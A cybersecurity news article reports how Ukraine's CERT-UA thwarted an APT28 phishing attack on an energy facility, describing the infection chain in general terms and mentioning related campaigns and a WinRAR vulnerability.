Ukraine’s CERT Foils APT28 Cyberattack Aimed at Energy Infrastructure

September 6, 2023

Ukraine's Computer Emergency Response Team (CERT-UA) reported on Tuesday that it had successfully averted a cyber attack on a critical energy infrastructure facility within the nation. The attack was initiated by a phishing email that contained a link to a malicious ZIP archive, initiating the infection chain. CERT-UA stated, "Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file 'weblinks.cmd' to the victim's computer," attributing the attack to the Russian threat actor known as APT28, also referred to as BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE.

When the CMD file is executed, several decoy web pages open, and .bat and .vbs files are created. A VBS file is then launched, which subsequently executes the BAT file. The next stage of the attack involves running the 'whoami' command on the compromised host and exfiltrating the data, and the TOR hidden service is downloaded to route malicious traffic. The attack achieves persistence through a scheduled task, and remote command execution is facilitated using cURL via a legitimate service called webhook.site, which was recently revealed to be utilized by a threat actor known as Dark Pink.

CERT-UA reported that the attack was ultimately unsuccessful due to restricted access to Mocky and the Windows Script Host (wscript.exe). It is important to note that APT28 has been previously associated with the use of Mocky APIs.

The revelation of this thwarted attack comes in the context of ongoing phishing attacks against Ukraine, some of which have been observed using a malware obfuscation engine called ScruptCrypt to distribute AsyncRAT. Another cyberattack, attributed to GhostWriter (also known as UAC-0057 or UNC1151), reportedly exploited a recently disclosed zero-day flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) to deploy PicassoLoader and Cobalt Strike.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.